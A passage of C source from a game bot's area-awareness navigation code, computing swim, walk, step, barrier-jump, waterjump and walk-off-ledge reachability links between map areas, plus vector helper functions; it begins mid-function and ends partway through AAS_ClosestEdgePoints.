			face2num = abs(aasworld.faceindex[area2->firstface + j]);
			//the areas are adjacent when they share a face
			if (face1num == face2num)
			{
				AAS_FaceCenter(face1num, start);
				//the shared face center must actually be in a liquid
				if (AAS_PointContents(start) & (CONTENTS_LAVA|CONTENTS_SLIME|CONTENTS_WATER))
				{
					//
					face1 = &aasworld.faces[face1num];
					//create a new reachability link
					lreach = AAS_AllocReachability();
					if (!lreach) return qfalse;
					lreach->areanum = area2num;
					lreach->facenum = face1num;
					lreach->edgenum = 0;
					VectorCopy(start, lreach->start);
					//XOR with side1 selects the plane facing away from area1,
					//so moving against its normal leads into area2
					plane = &aasworld.planes[face1->planenum ^ side1];
					VectorMA(lreach->start, -INSIDEUNITS, plane->normal, lreach->end);
					lreach->traveltype = TRAVEL_SWIM;
					lreach->traveltime = 1;
					//if the volume of the area is rather small, penalize the route
					if (AAS_AreaVolume(area2num) < 800)
						lreach->traveltime += 200;
					//if (!(AAS_PointContents(start) & MASK_WATER)) lreach->traveltime += 500;
					//link the reachability at the head of area1's list
					lreach->next = areareachability[area1num];
					areareachability[area1num] = lreach;
					reach_swim++;
					return qtrue;
				} //end if
			} //end if
		} //end for
	} //end for
	return qfalse;
} //end of the function AAS_Reachability_Swim
//===========================================================================
// searches for reachabilities between adjacent areas with equal floor
// heights
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_EqualFloorHeight(int area1num, int area2num)
{
	int i, j, edgenum, edgenum1, edgenum2, foundreach, side;
	float height, bestheight, length, bestlength;
	vec3_t dir, start, end, normal, invgravity, gravitydirection = {0, 0, -1};
	vec3_t edgevec;
	aas_area_t *area1, *area2;
	aas_face_t *face1, *face2;
	aas_edge_t *edge;
	aas_plane_t *plane2;
	aas_lreachability_t lr, *lreach;
	//both areas must have ground to walk on
	if (!AAS_AreaGrounded(area1num) || !AAS_AreaGrounded(area2num)) return qfalse;
	area1 = &aasworld.areas[area1num];
	area2 = &aasworld.areas[area2num];
	//if the areas are not near enough in the x-y direction
	for (i = 0; i < 2; i++)
	{
		if (area1->mins[i] > area2->maxs[i] + 10) return qfalse;
		if (area1->maxs[i] < area2->mins[i] - 10) return qfalse;
	} //end for
	//if area 2 is too high above area 1
	if (area2->mins[2] > area1->maxs[2]) return qfalse;
	//invgravity points up, opposite to the gravity direction
	VectorCopy(gravitydirection, invgravity);
	VectorInverse(invgravity);
	//
	bestheight = 99999;
	bestlength = 0;
	foundreach = qfalse;
	Com_Memset(&lr, 0, sizeof(aas_lreachability_t)); //make the compiler happy
	//
	//check if the areas have ground faces with a common edge
	//if existing use the lowest common edge for a reachability link
	for (i = 0; i < area1->numfaces; i++)
	{
		face1 = &aasworld.faces[abs(aasworld.faceindex[area1->firstface + i])];
		if (!(face1->faceflags & FACE_GROUND)) continue;
		//
		for (j = 0; j < area2->numfaces; j++)
		{
			face2 = &aasworld.faces[abs(aasworld.faceindex[area2->firstface + j])];
			if (!(face2->faceflags & FACE_GROUND)) continue;
			//if there is a common edge (compare by absolute edge index)
			for (edgenum1 = 0; edgenum1 < face1->numedges; edgenum1++)
			{
				for (edgenum2 = 0; edgenum2 < face2->numedges; edgenum2++)
				{
					if (abs(aasworld.edgeindex[face1->firstedge + edgenum1]) !=
							abs(aasworld.edgeindex[face2->firstedge + edgenum2]))
								continue;
					//a negative edge index flags the winding direction of the edge
					edgenum = aasworld.edgeindex[face1->firstedge + edgenum1];
					side = edgenum < 0;
					edge = &aasworld.edges[abs(edgenum)];
					//get the length of the edge
					VectorSubtract(aasworld.vertexes[edge->v[1]],
									aasworld.vertexes[edge->v[0]], dir);
					length = VectorLength(dir);
					//get the start point (midpoint of the shared edge)
					VectorAdd(aasworld.vertexes[edge->v[0]],
								aasworld.vertexes[edge->v[1]], start);
					VectorScale(start, 0.5, start);
					VectorCopy(start, end);
					//get the end point several units inside area2
					//and the start point several units inside area1
					//NOTE: normal is pointing into area2 because the
					//face edges are stored counter clockwise
					VectorSubtract(aasworld.vertexes[edge->v[side]],
									aasworld.vertexes[edge->v[!side]], edgevec);
					plane2 = &aasworld.planes[face2->planenum];
					CrossProduct(edgevec, plane2->normal, normal);
					VectorNormalize(normal);
					//
					//VectorMA(start, -1, normal, start);
					VectorMA(end, INSIDEUNITS_WALKEND, normal, end);
					VectorMA(start, INSIDEUNITS_WALKSTART, normal, start);
					//lift the end point slightly off the floor
					end[2] += 0.125;
					//height of the start point along the up direction
					height = DotProduct(invgravity, start);
					//NOTE: if there's nearby solid or a gap area after this area
					//disabled this crap
					//if (AAS_NearbySolidOrGap(start, end)) height += 200;
					//NOTE: disabled because it disables reachabilities to very small areas
					//if (AAS_PointAreaNum(end) != area2num) continue;
					//get the longest lowest edge
					if (height < bestheight ||
							(height < bestheight + 1 && length > bestlength))
					{
						bestheight = height;
						bestlength = length;
						//remember the best candidate in the local lr record;
						//the actual link is only allocated after the search
						lr.areanum = area2num;
						lr.facenum = 0;
						lr.edgenum = edgenum;
						VectorCopy(start, lr.start);
						VectorCopy(end, lr.end);
						lr.traveltype = TRAVEL_WALK;
						lr.traveltime = 1;
						foundreach = qtrue;
					} //end if
				} //end for
			} //end for
		} //end for
	} //end for
	if (foundreach)
	{
		//create a new reachability link from the best candidate found
		lreach = AAS_AllocReachability();
		if (!lreach) return qfalse;
		lreach->areanum = lr.areanum;
		lreach->facenum = lr.facenum;
		lreach->edgenum = lr.edgenum;
		VectorCopy(lr.start, lreach->start);
		VectorCopy(lr.end, lreach->end);
		lreach->traveltype = lr.traveltype;
		lreach->traveltime = lr.traveltime;
		lreach->next = areareachability[area1num];
		areareachability[area1num] = lreach;
		//if going into a crouch area, add the time to start crouching
		if (!AAS_AreaCrouch(area1num) && AAS_AreaCrouch(area2num))
		{
			lreach->traveltime += aassettings.rs_startcrouch;
		} //end if
		/*
		//NOTE: if there's nearby solid or a gap area after this area
		if (!AAS_NearbySolidOrGap(lreach->start, lreach->end))
		{
			lreach->traveltime += 100;
		} //end if
		*/
		//avoid rather small areas
		//if (AAS_AreaGroundFaceArea(lreach->areanum) < 500) lreach->traveltime += 100;
		//
		reach_equalfloor++;
		return qtrue;
	} //end if
	return qfalse;
} //end of the function AAS_Reachability_EqualFloorHeight
//===========================================================================
// searches step, barrier, waterjump and walk off ledge reachabilities
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_Step_Barrier_WaterJump_WalkOffLedge(int area1num, int area2num)
{
int i, j, k, l, edge1num, edge2num, areas[10], numareas;
int ground_bestarea2groundedgenum, ground_foundreach;
int water_bestarea2groundedgenum, water_foundreach;
int side1, area1swim, faceside1, groundface1num;
float dist, dist1, dist2, diff, ortdot;
//float invgravitydot;
float x1, x2, x3, x4, y1, y2, y3, y4, tmp, y;
float length, ground_bestlength, water_bestlength, ground_bestdist, water_bestdist;
vec3_t v1, v2, v3, v4, tmpv, p1area1, p1area2, p2area1, p2area2;
vec3_t normal, ort, edgevec, start, end, dir;
vec3_t ground_beststart = {0, 0, 0}, ground_bestend = {0, 0, 0}, ground_bestnormal = {0, 0, 0};
vec3_t water_beststart = {0, 0, 0}, water_bestend = {0, 0, 0}, water_bestnormal = {0, 0, 0};
vec3_t invgravity = {0, 0, 1};
vec3_t testpoint;
aas_plane_t *plane;
aas_area_t *area1, *area2;
aas_face_t *groundface1, *groundface2;
aas_edge_t *edge1, *edge2;
aas_lreachability_t *lreach;
aas_trace_t trace;
//must be able to walk or swim in the first area
if (!AAS_AreaGrounded(area1num) && !AAS_AreaSwim(area1num)) return qfalse;
//
if (!AAS_AreaGrounded(area2num) && !AAS_AreaSwim(area2num)) return qfalse;
//
area1 = &aasworld.areas[area1num];
area2 = &aasworld.areas[area2num];
//if the first area contains a liquid
area1swim = AAS_AreaSwim(area1num);
//if the areas are not near enough in the x-y direction
for (i = 0; i < 2; i++)
{
if (area1->mins[i] > area2->maxs[i] + 10) return qfalse;
if (area1->maxs[i] < area2->mins[i] - 10) return qfalse;
} //end for
//
ground_foundreach = qfalse;
ground_bestdist = 99999;
ground_bestlength = 0;
ground_bestarea2groundedgenum = 0;
//
water_foundreach = qfalse;
water_bestdist = 99999;
water_bestlength = 0;
water_bestarea2groundedgenum = 0;
//
for (i = 0; i < area1->numfaces; i++)
{
groundface1num = aasworld.faceindex[area1->firstface + i];
faceside1 = groundface1num < 0;
groundface1 = &aasworld.faces[abs(groundface1num)];
//if this isn't a ground face
if (!(groundface1->faceflags & FACE_GROUND))
{
//if we can swim in the first area
if (area1swim)
{
//face plane must be more or less horizontal
plane = &aasworld.planes[groundface1->planenum ^ (!faceside1)];
if (DotProduct(plane->normal, invgravity) < 0.7) continue;
} //end if
else
{
//if we can't swim in the area it must be a ground face
continue;
} //end else
} //end if
//
for (k = 0; k < groundface1->numedges; k++)
{
edge1num = aasworld.edgeindex[groundface1->firstedge + k];
side1 = (edge1num < 0);
//NOTE: for water faces we must take the side area 1 is
// on into account because the face is shared and doesn't
// have to be oriented correctly
if (!(groundface1->faceflags & FACE_GROUND)) side1 = (side1 == faceside1);
edge1num = abs(edge1num);
edge1 = &aasworld.edges[edge1num];
//vertexes of the edge
VectorCopy(aasworld.vertexes[edge1->v[!side1]], v1);
VectorCopy(aasworld.vertexes[edge1->v[side1]], v2);
//get a vertical plane through the edge
//NOTE: normal is pointing into area 2 because the
//face edges are stored counter clockwise
VectorSubtract(v2, v1, edgevec);
CrossProduct(edgevec, invgravity, normal);
VectorNormalize(normal);
dist = DotProduct(normal, v1);
//check the faces from the second area
for (j = 0; j < area2->numfaces; j++)
{
groundface2 = &aasworld.faces[abs(aasworld.faceindex[area2->firstface + j])];
//must be a ground face
if (!(groundface2->faceflags & FACE_GROUND)) continue;
//check the edges of this ground face
for (l = 0; l < groundface2->numedges; l++)
{
edge2num = abs(aasworld.edgeindex[groundface2->firstedge + l]);
edge2 = &aasworld.edges[edge2num];
//vertexes of the edge
VectorCopy(aasworld.vertexes[edge2->v[0]], v3);
VectorCopy(aasworld.vertexes[edge2->v[1]], v4);
//check the distance between the two points and the vertical plane
//through the edge of area1
diff = DotProduct(normal, v3) - dist;
if (diff < -0.1 || diff > 0.1) continue;
diff = DotProduct(normal, v4) - dist;
if (diff < -0.1 || diff > 0.1) continue;
//
//project the two ground edges into the step side plane
//and calculate the shortest distance between the two
//edges if they overlap in the direction orthogonal to
//the gravity direction
CrossProduct(invgravity, normal, ort);
//invgravitydot = DotProduct(invgravity, invgravity);
ortdot = DotProduct(ort, ort);
//projection into the step plane
//NOTE: since gravity is vertical this is just the z coordinate
y1 = v1[2];//DotProduct(v1, invgravity) / invgravitydot;
y2 = v2[2];//DotProduct(v2, invgravity) / invgravitydot;
y3 = v3[2];//DotProduct(v3, invgravity) / invgravitydot;
y4 = v4[2];//DotProduct(v4, invgravity) / invgravitydot;
//
x1 = DotProduct(v1, ort) / ortdot;
x2 = DotProduct(v2, ort) / ortdot;
x3 = DotProduct(v3, ort) / ortdot;
x4 = DotProduct(v4, ort) / ortdot;
//
if (x1 > x2)
{
tmp = x1; x1 = x2; x2 = tmp;
tmp = y1; y1 = y2; y2 = tmp;
VectorCopy(v1, tmpv); VectorCopy(v2, v1); VectorCopy(tmpv, v2);
} //end if
if (x3 > x4)
{
tmp = x3; x3 = x4; x4 = tmp;
tmp = y3; y3 = y4; y4 = tmp;
VectorCopy(v3, tmpv); VectorCopy(v4, v3); VectorCopy(tmpv, v4);
} //end if
//if the two projected edge lines have no overlap
if (x2 <= x3 || x4 <= x1)
{
// Log_Write("lines no overlap: from area %d to %d\r\n", area1num, area2num);
continue;
} //end if
//if the two lines fully overlap
if ((x1 - 0.5 < x3 && x4 < x2 + 0.5) &&
(x3 - 0.5 < x1 && x2 < x4 + 0.5))
{
dist1 = y3 - y1;
dist2 = y4 - y2;
VectorCopy(v1, p1area1);
VectorCopy(v2, p2area1);
VectorCopy(v3, p1area2);
VectorCopy(v4, p2area2);
} //end if
else
{
//if the points are equal
if (x1 > x3 - 0.1 && x1 < x3 + 0.1)
{
dist1 = y3 - y1;
VectorCopy(v1, p1area1);
VectorCopy(v3, p1area2);
} //end if
else if (x1 < x3)
{
y = y1 + (x3 - x1) * (y2 - y1) / (x2 - x1);
dist1 = y3 - y;
VectorCopy(v3, p1area1);
p1area1[2] = y;
VectorCopy(v3, p1area2);
} //end if
else
{
y = y3 + (x1 - x3) * (y4 - y3) / (x4 - x3);
dist1 = y - y1;
VectorCopy(v1, p1area1);
VectorCopy(v1, p1area2);
p1area2[2] = y;
} //end if
//if the points are equal
if (x2 > x4 - 0.1 && x2 < x4 + 0.1)
{
dist2 = y4 - y2;
VectorCopy(v2, p2area1);
VectorCopy(v4, p2area2);
} //end if
else if (x2 < x4)
{
y = y3 + (x2 - x3) * (y4 - y3) / (x4 - x3);
dist2 = y - y2;
VectorCopy(v2, p2area1);
VectorCopy(v2, p2area2);
p2area2[2] = y;
} //end if
else
{
y = y1 + (x4 - x1) * (y2 - y1) / (x2 - x1);
dist2 = y4 - y;
VectorCopy(v4, p2area1);
p2area1[2] = y;
VectorCopy(v4, p2area2);
} //end else
} //end else
//if both distances are pretty much equal
//then we take the middle of the points
if (dist1 > dist2 - 1 && dist1 < dist2 + 1)
{
dist = dist1;
VectorAdd(p1area1, p2area1, start);
VectorScale(start, 0.5, start);
VectorAdd(p1area2, p2area2, end);
VectorScale(end, 0.5, end);
} //end if
else if (dist1 < dist2)
{
dist = dist1;
VectorCopy(p1area1, start);
VectorCopy(p1area2, end);
} //end else if
else
{
dist = dist2;
VectorCopy(p2area1, start);
VectorCopy(p2area2, end);
} //end else
//get the length of the overlapping part of the edges of the two areas
VectorSubtract(p2area2, p1area2, dir);
length = VectorLength(dir);
//
if (groundface1->faceflags & FACE_GROUND)
{
//if the vertical distance is smaller
if (dist < ground_bestdist ||
//or the vertical distance is pretty much the same
//but the overlapping part of the edges is longer
(dist < ground_bestdist + 1 && length > ground_bestlength))
{
ground_bestdist = dist;
ground_bestlength = length;
ground_foundreach = qtrue;
ground_bestarea2groundedgenum = edge1num;
//best point towards area1
VectorCopy(start, ground_beststart);
//normal is pointing into area2
VectorCopy(normal, ground_bestnormal);
//best point towards area2
VectorCopy(end, ground_bestend);
} //end if
} //end if
else
{
//if the vertical distance is smaller
if (dist < water_bestdist ||
//or the vertical distance is pretty much the same
//but the overlapping part of the edges is longer
(dist < water_bestdist + 1 && length > water_bestlength))
{
water_bestdist = dist;
water_bestlength = length;
water_foundreach = qtrue;
water_bestarea2groundedgenum = edge1num;
//best point towards area1
VectorCopy(start, water_beststart);
//normal is pointing into area2
VectorCopy(normal, water_bestnormal);
//best point towards area2
VectorCopy(end, water_bestend);
} //end if
} //end else
} //end for
} //end for
} //end for
} //end for
//
// NOTE: swim reachabilities are already filtered out
//
// Steps
//
// ---------
// | step height -> TRAVEL_WALK
//--------|
//
// ---------
//~~~~~~~~| step height and low water -> TRAVEL_WALK
//--------|
//
//~~~~~~~~~~~~~~~~~~
// ---------
// | step height and low water up to the step -> TRAVEL_WALK
//--------|
//
//check for a step reachability
if (ground_foundreach)
{
//if area2 is higher but lower than the maximum step height
//NOTE: ground_bestdist >= 0 also catches equal floor reachabilities
if (ground_bestdist >= 0 && ground_bestdist < aassettings.phys_maxstep)
{
//create walk reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = ground_bestarea2groundedgenum;
VectorMA(ground_beststart, INSIDEUNITS_WALKSTART, ground_bestnormal, lreach->start);
VectorMA(ground_bestend, INSIDEUNITS_WALKEND, ground_bestnormal, lreach->end);
lreach->traveltype = TRAVEL_WALK;
lreach->traveltime = 0;//1;
//if going into a crouch area
if (!AAS_AreaCrouch(area1num) && AAS_AreaCrouch(area2num))
{
lreach->traveltime += aassettings.rs_startcrouch;
} //end if
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//NOTE: if there's nearby solid or a gap area after this area
/*
if (!AAS_NearbySolidOrGap(lreach->start, lreach->end))
{
lreach->traveltime += 100;
} //end if
*/
//avoid rather small areas
//if (AAS_AreaGroundFaceArea(lreach->areanum) < 500) lreach->traveltime += 100;
//
reach_step++;
return qtrue;
} //end if
} //end if
//
// Water Jumps
//
// ---------
// |
//~~~~~~~~|
// |
// | higher than step height and water up to waterjump height -> TRAVEL_WATERJUMP
//--------|
//
//~~~~~~~~~~~~~~~~~~
// ---------
// |
// |
// |
// | higher than step height and low water up to the step -> TRAVEL_WATERJUMP
//--------|
//
//check for a waterjump reachability
if (water_foundreach)
{
//get a test point a little bit towards area1
VectorMA(water_bestend, -INSIDEUNITS, water_bestnormal, testpoint);
//go down the maximum waterjump height
testpoint[2] -= aassettings.phys_maxwaterjump;
//if there IS water the sv_maxwaterjump height below the bestend point
if (aasworld.areasettings[AAS_PointAreaNum(testpoint)].areaflags & AREA_LIQUID)
{
//don't create rediculous water jump reachabilities from areas very far below
//the water surface
if (water_bestdist < aassettings.phys_maxwaterjump + 24)
{
//waterjumping from or towards a crouch only area is not possible in Quake2
if ((aasworld.areasettings[area1num].presencetype & PRESENCE_NORMAL) &&
(aasworld.areasettings[area2num].presencetype & PRESENCE_NORMAL))
{
//create water jump reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = water_bestarea2groundedgenum;
VectorCopy(water_beststart, lreach->start);
VectorMA(water_bestend, INSIDEUNITS_WATERJUMP, water_bestnormal, lreach->end);
lreach->traveltype = TRAVEL_WATERJUMP;
lreach->traveltime = aassettings.rs_waterjump;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//we've got another waterjump reachability
reach_waterjump++;
return qtrue;
} //end if
} //end if
} //end if
} //end if
//
// Barrier Jumps
//
// ---------
// |
// |
// |
// | higher than step height lower than barrier height -> TRAVEL_BARRIERJUMP
//--------|
//
// ---------
// |
// |
// |
//~~~~~~~~| higher than step height lower than barrier height
//--------| and a thin layer of water in the area to jump from -> TRAVEL_BARRIERJUMP
//
//check for a barrier jump reachability
if (ground_foundreach)
{
//if area2 is higher but lower than the maximum barrier jump height
if (ground_bestdist > 0 && ground_bestdist < aassettings.phys_maxbarrier)
{
//if no water in area1 or a very thin layer of water on the ground
if (!water_foundreach || (ground_bestdist - water_bestdist < 16))
{
//cannot perform a barrier jump towards or from a crouch area in Quake2
if (!AAS_AreaCrouch(area1num) && !AAS_AreaCrouch(area2num))
{
//create barrier jump reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = ground_bestarea2groundedgenum;
VectorMA(ground_beststart, INSIDEUNITS_WALKSTART, ground_bestnormal, lreach->start);
VectorMA(ground_bestend, INSIDEUNITS_WALKEND, ground_bestnormal, lreach->end);
lreach->traveltype = TRAVEL_BARRIERJUMP;
lreach->traveltime = aassettings.rs_barrierjump;//AAS_BarrierJumpTravelTime();
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//we've got another barrierjump reachability
reach_barrier++;
return qtrue;
} //end if
} //end if
} //end if
} //end if
//
// Walk and Walk Off Ledge
//
//--------|
// | can walk or step back -> TRAVEL_WALK
// ---------
//
//--------|
// |
// |
// |
// | cannot walk/step back -> TRAVEL_WALKOFFLEDGE
// ---------
//
//--------|
// |
// |~~~~~~~~
// |
// | cannot step back but can waterjump back -> TRAVEL_WALKOFFLEDGE
// --------- FIXME: create TRAVEL_WALK reach??
//
//check for a walk or walk off ledge reachability
if (ground_foundreach)
{
if (ground_bestdist < 0)
{
if (ground_bestdist > -aassettings.phys_maxstep)
{
//create walk reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = ground_bestarea2groundedgenum;
VectorMA(ground_beststart, INSIDEUNITS_WALKSTART, ground_bestnormal, lreach->start);
VectorMA(ground_bestend, INSIDEUNITS_WALKEND, ground_bestnormal, lreach->end);
lreach->traveltype = TRAVEL_WALK;
lreach->traveltime = 1;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//we've got another walk reachability
reach_walk++;
return qtrue;
} //end if
// if no maximum fall height set or less than the max
if (!aassettings.rs_maxfallheight || fabs(ground_bestdist) < aassettings.rs_maxfallheight) {
//trace a bounding box vertically to check for solids
VectorMA(ground_bestend, INSIDEUNITS, ground_bestnormal, ground_bestend);
VectorCopy(ground_bestend, start);
start[2] = ground_beststart[2];
VectorCopy(ground_bestend, end);
end[2] += 4;
trace = AAS_TraceClientBBox(start, end, PRESENCE_NORMAL, -1);
//if no solids were found
if (!trace.startsolid && trace.fraction >= 1.0)
{
//the trace end point must be in the goal area
trace.endpos[2] += 1;
if (AAS_PointAreaNum(trace.endpos) == area2num)
{
//if not going through a cluster portal
numareas = AAS_TraceAreas(start, end, areas, NULL, ARRAY_LEN(areas));
for (i = 0; i < numareas; i++)
if (AAS_AreaClusterPortal(areas[i]))
break;
if (i >= numareas)
{
//create a walk off ledge reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = ground_bestarea2groundedgenum;
VectorCopy(ground_beststart, lreach->start);
VectorCopy(ground_bestend, lreach->end);
lreach->traveltype = TRAVEL_WALKOFFLEDGE;
lreach->traveltime = aassettings.rs_startwalkoffledge + fabs(ground_bestdist) * 50 / aassettings.phys_gravity;
//if falling from too high and not falling into water
if (!AAS_AreaSwim(area2num) && !AAS_AreaJumpPad(area2num))
{
if (AAS_FallDelta(ground_bestdist) > aassettings.phys_falldelta5)
{
lreach->traveltime += aassettings.rs_falldamage5;
} //end if
if (AAS_FallDelta(ground_bestdist) > aassettings.phys_falldelta10)
{
lreach->traveltime += aassettings.rs_falldamage10;
} //end if
} //end if
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_walkoffledge++;
//NOTE: don't create a weapon (rl, bfg) jump reachability here
//because it interferes with other reachabilities
//like the ladder reachability
return qtrue;
} //end if
} //end if
} //end if
} //end if
} //end else
} //end if
return qfalse;
} //end of the function AAS_Reachability_Step_Barrier_WaterJump_WalkOffLedge
//===========================================================================
// returns the distance between the two vectors
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
float VectorDistance(vec3_t v1, vec3_t v2)
{
	vec3_t delta;

	//the distance between two points is the length of their difference vector
	VectorSubtract(v2, v1, delta);
	return VectorLength(delta);
} //end of the function VectorDistance
//===========================================================================
// returns true if the first vector is between the last two vectors
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int VectorBetweenVectors(vec3_t v, vec3_t v1, vec3_t v2)
{
	vec3_t tov1, tov2;

	//v lies between v1 and v2 when the vectors from v towards each end
	//point in opposite (or perpendicular) directions
	VectorSubtract(v, v1, tov1);
	VectorSubtract(v, v2, tov2);
	return (DotProduct(tov1, tov2) <= 0);
} //end of the function VectorBetweenVectors
//===========================================================================
// returns the mid point between the two vectors
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void VectorMiddle(vec3_t v1, vec3_t v2, vec3_t middle)
{
	//component-wise average of the two vectors
	VectorAdd(v1, v2, middle);
	VectorScale(middle, 0.5, middle);
} //end of the function VectorMiddle
//===========================================================================
// calculate a range of points closest to each other on both edges
//
// Parameter: beststart1 start of the range of points on edge v1-v2
// beststart2 end of the range of points on edge v1-v2
// bestend1 start of the range of points on edge v3-v4
// bestend2 end of the range of points on edge v3-v4
// bestdist best distance so far
// Returns: -
// Changes Globals: -
//===========================================================================
/*
float AAS_ClosestEdgePoints(vec3_t v1, vec3_t v2, vec3_t v3, vec3_t v4,
aas_plane_t *plane1, aas_plane_t *plane2,
vec3_t beststart, vec3_t bestend, float bestdist)
{
vec3_t dir1, dir2, p1, p2, p3, p4;
float a1, a2, b1, b2, dist;
int founddist;
//edge vectors
VectorSubtract(v2, v1, dir1);
VectorSubtract(v4, v3, dir2);
//get the horizontal directions
dir1[2] = 0;
dir2[2] = 0;
//
// p1 = point on an edge vector of area2 closest to v1
// p2 = point on an edge vector of area2 closest to v2
// p3 = point on an edge vector of area1 closest to v3
// p4 = point on an edge vector of area1 closest to v4
//
if (dir2[0])
{
a2 = dir2[1] / dir2[0];
b2 = v3[1] - a2 * v3[0];
//point on the edge vector of area2 closest to v1
p1[0] = (DotProduct(v1, dir2) - (a2 * dir2[0] + b2 * dir2[1])) / dir2[0];
p1[1] = a2 * p1[0] + b2;
//point on the edge vector of area2 closest to v2
p2[0] = (DotProduct(v2, dir2) - (a2 * dir2[0] + b2 * dir2[1])) / dir2[0];
p2[1] = a2 * p2[0] + b2;
} //end if
else
{
//point on the edge vector of area2 closest to v1
p1[0] = v3[0];
p1[1] = v1[1];
//point on the edge vector of area2 closest to v2
p2[0] = v3[0];
p2[1] = v2[1];
} //end else
//
if (dir1[0])
{
//
a1 = dir1[1] / dir1[0];
b1 = v1[1] - a1 * v1[0];
//point on the edge vector of area1 closest to v3
p3[0] = (DotProduct(v3, dir1) - (a1 * dir1[0] + b1 * dir1[1])) / dir1[0];
p3[1] = a1 * p3[0] + b1;
//point on the edge vector of area1 closest to v4
p4[0] = (DotProduct(v4, dir1) - (a1 * dir1[0] + b1 * dir1[1])) / dir1[0];
p4[1] = a1 * p4[0] + b1;
} //end if
else
{
//point on the edge vector of area1 closest to v3
p3[0] = v1[0];
p3[1] = v3[1];
//point on the edge vector of area1 closest to v4
p4[0] = v1[0];
p4[1] = v4[1];
} //end else
//start with zero z-coordinates
p1[2] = 0;
p2[2] = 0;
p3[2] = 0;
p4[2] = 0;
//calculate the z-coordinates from the ground planes
p1[2] = (plane2->dist - DotProduct(plane2->normal, p1)) / plane2->normal[2];
p2[2] = (plane2->dist - DotProduct(plane2->normal, p2)) / plane2->normal[2];
p3[2] = (plane1->dist - DotProduct(plane1->normal, p3)) / plane1->normal[2];
p4[2] = (plane1->dist - DotProduct(plane1->normal, p4)) / plane1->normal[2];
//
founddist = qfalse;
//
if (VectorBetweenVectors(p1, v3, v4))
{
dist = VectorDistance(v1, p1);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
VectorMiddle(beststart, v1, beststart);
VectorMiddle(bestend, p1, bestend);
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v1, beststart);
VectorCopy(p1, bestend);
} //end if
founddist = qtrue;
} //end if
if (VectorBetweenVectors(p2, v3, v4))
{
dist = VectorDistance(v2, p2);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
VectorMiddle(beststart, v2, beststart);
VectorMiddle(bestend, p2, bestend);
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v2, beststart);
VectorCopy(p2, bestend);
} //end if
founddist = qtrue;
} //end else if
if (VectorBetweenVectors(p3, v1, v2))
{
dist = VectorDistance(v3, p3);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
VectorMiddle(beststart, p3, beststart);
VectorMiddle(bestend, v3, bestend);
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(p3, beststart);
VectorCopy(v3, bestend);
} //end if
founddist = qtrue;
} //end else if
if (VectorBetweenVectors(p4, v1, v2))
{
dist = VectorDistance(v4, p4);
if (dist > bestdist - 0.5 && dist < bestdist + 0.5)
{
VectorMiddle(beststart, p4, beststart);
VectorMiddle(bestend, v4, bestend);
} //end if
else if (dist < bestdist)
{
bestdist = dist;
VectorCopy(p4, beststart);
VectorCopy(v4, bestend);
} //end if
founddist = qtrue;
} //end else if
//if no shortest distance was found the shortest distance
//is between one of the vertexes of edge1 and one of edge2
if (!founddist)
{
dist = VectorDistance(v1, v3);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v1, beststart);
VectorCopy(v3, bestend);
} //end if
dist = VectorDistance(v1, v4);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v1, beststart);
VectorCopy(v4, bestend);
} //end if
dist = VectorDistance(v2, v3);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v2, beststart);
VectorCopy(v3, bestend);
} //end if
dist = VectorDistance(v2, v4);
if (dist < bestdist)
{
bestdist = dist;
VectorCopy(v2, beststart);
VectorCopy(v4, bestend);
} //end if
} //end if
return bestdist;
} //end of the function AAS_ClosestEdgePoints*/
float AAS_ClosestEdgePoints(vec3_t v1, vec3_t v2, vec3_t v3, vec3_t v4,
							aas_plane_t *plane1, aas_plane_t *plane2,
							vec3_t beststart1, vec3_t bestend1,
							vec3_t beststart2, vec3_t bestend2, float bestdist)
{
	//finds the closest range of points between edge v1-v2 (on the ground of
	//area1) and edge v3-v4 (on the ground of area2), updating the in/out
	//range endpoints beststart1/beststart2 and bestend1/bestend2 only when a
	//distance at least as good as bestdist is found; returns the (possibly
	//improved) best distance
	//NOTE(review): the range endpoints are only written when this function
	//improves on bestdist, so callers must initialize them before the first call
	vec3_t dir1, dir2, p1, p2, p3, p4;
	float a1, a2, b1, b2, dist, dist1, dist2;
	int founddist;
	//edge vectors
	VectorSubtract(v2, v1, dir1);
	VectorSubtract(v4, v3, dir2);
	//get the horizontal directions
	dir1[2] = 0;
	dir2[2] = 0;
	//
	// p1 = point on an edge vector of area2 closest to v1
	// p2 = point on an edge vector of area2 closest to v2
	// p3 = point on an edge vector of area1 closest to v3
	// p4 = point on an edge vector of area1 closest to v4
	//
	//project in 2D: express the edge line as y = a*x + b and solve for the
	//foot of the perpendicular (axis-aligned fallback when the edge has no
	//x extent and the slope would be infinite)
	if (dir2[0])
	{
		a2 = dir2[1] / dir2[0];
		b2 = v3[1] - a2 * v3[0];
		//point on the edge vector of area2 closest to v1
